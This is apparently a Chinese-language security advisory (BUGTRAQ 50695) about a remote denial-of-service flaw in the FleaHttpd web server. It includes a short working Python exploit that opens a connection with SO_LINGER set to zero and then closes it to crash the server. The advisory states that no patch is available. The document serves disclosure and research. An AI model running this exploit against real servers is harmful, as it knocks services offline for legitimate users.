发布日期:2011-11-16
更新日期:2011-11-17
受影响系统:
FleaHttpd FleaHttpd
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 50695
FleaHttpd“跳蚤服务器”是一个用C从头写的一个轻量级网络伺服器,静态文件的抓取速度大概是Apache的三倍。
FleaHttpd在实现上存在远程拒绝服务漏洞,远程攻击者可利用此漏洞使应用程序崩溃,拒绝服务合法用户。
<*来源:condis
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/python
"""
FleaHttpd Remote Denial Of Service Exploit
by condis
"FleaHttpd is a http daemon written from scratch in C. When working as a
static file server, data show that under certain condition, fleahttpd's
speed for static file retrieving can be three times faster than Apache2"
project site (source):
Tested on: Linux Debian
Just 4 fun :x
"""
import sys, socket, struct
host = '127.0.0.1'
port = 80
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
sock.connect((host, port))
sock.close()
print "Phuck3d!"
except:
print "whOoPs?!"
建议:
--------------------------------------------------------------------------------
厂商补丁:
FleaHttpd
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: